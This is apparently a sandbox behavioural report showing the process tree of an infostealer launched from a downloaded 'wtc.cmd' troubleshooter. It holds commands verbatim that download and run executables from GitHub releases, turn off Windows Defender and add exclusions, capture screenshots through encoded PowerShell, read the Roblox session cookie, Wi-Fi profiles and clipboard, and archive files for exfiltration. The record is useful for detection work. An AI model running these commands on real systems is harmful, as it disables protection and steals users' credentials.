    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,2443892208283643395,6623879741041551108,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4888 /prefetch:8
    3⤵
    PID:4224
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5052,i,2443892208283643395,6623879741041551108,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4272 /prefetch:8
    3⤵
    - NTFS ADS
    PID:800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\wtc.cmd"
  2⤵
  PID:2984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Write-Host 'Troubleshoot started...' -ForegroundColor Green"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "[void](New-Item -ItemType Directory -Force -Path 'C:\l')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/o2ojy6eyu/win1/releases/download/v1/wts.zip' -OutFile 'C:\l\winup.zip'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\l\winup.zip', 'C:\l')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Start-Process 'C:\l\wts.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2836
  - - C:\l\wts.exe
      "C:\l\wts.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri "https://github.com/newbigs/newintsh/releases/download/v1/jCLjDWsLU" -OutFile "C:\Users\Public\Guard.exe""
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:396
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5284
      - C:\Users\Public\Guard.exe
        
        "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Start-Process 'C:\l\winb.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3440
  - - C:\l\winb.exe
      "C:\l\winb.exe"
      4⤵
      Executes dropped EXE
      PID:3748
    - - C:\l\winb.exe
        
        "C:\l\winb.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4256
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\l\winb.exe'"
        6⤵
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\l\winb.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4408
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        6⤵
        
        PID:2896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1468
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.', 0, 'windows', 48+16);close()""
        6⤵
        
        PID:1864
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.', 0, 'windows', 48+16);close()"
        7⤵
        
        PID:1824
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
        6⤵
        
        PID:1580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4152
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:2620
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:4380
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:3144
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:1680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        6⤵
        
        PID:2012
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        7⤵
        
        PID:5536
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:1828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        7⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:5548
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:4260
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:5652
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:4840
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5588
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4628
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5644
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:4612
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:5560
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        6⤵
        
        PID:5124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5636
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1nxvtjpm\1nxvtjpm.cmdline"
        8⤵
        
        PID:6056
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4522.tmp" "c:\Users\Admin\AppData\Local\Temp\1nxvtjpm\CSCC0CB4ADC38C54ED8B82388406B199541.TMP"
        9⤵
        
        PID:5624
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5756
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5924
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5952
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:6024
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6036
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:6124
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6136
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5252
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5272
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:5432
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4868"
        6⤵
        
        PID:5856
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4868
        7⤵
        Kills process with taskkill
        
        PID:5976
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4924"
        6⤵
        
        PID:5960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5952
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4924
        7⤵
        Kills process with taskkill
        
        PID:5612
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1724"
        6⤵
        
        PID:5548
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1724
        7⤵
        Kills process with taskkill
        
        PID:5688
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 780"
        6⤵
        
        PID:1904
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 780
        7⤵
        Kills process with taskkill
        
        PID:956
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1300"
        6⤵
        
        PID:3248
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1300
        7⤵
        Kills process with taskkill
        
        PID:3192
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3924"
        6⤵
        
        PID:6140
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3924
        7⤵
        Kills process with taskkill
        
        PID:1656
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2924"
        6⤵
        
        PID:5260
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2924
        7⤵
        Kills process with taskkill
        
        PID:5408
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:5624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4196
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        6⤵
        
        PID:5832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5544
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        6⤵
        
        PID:3124
        
        C:\Windows\system32\getmac.exe
        
        getmac
        7⤵
        
        PID:4720
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37482\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\bU2ya.zip" *"
        6⤵
        
        PID:1740
        
        C:\Users\Admin\AppData\Local\Temp\_MEI37482\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI37482\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\bU2ya.zip" *
        7⤵
        Executes dropped EXE
        
        PID:960
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        6⤵
        
        PID:32
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5536
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        7⤵
        
        PID:2500
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        6⤵
        
        PID:1632
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        7⤵
        
        PID:4292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:1604
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:4540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        6⤵
        
        PID:6024
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5856
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:2052
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:3584
      - C:\Windows\system32\cmd.exe
        
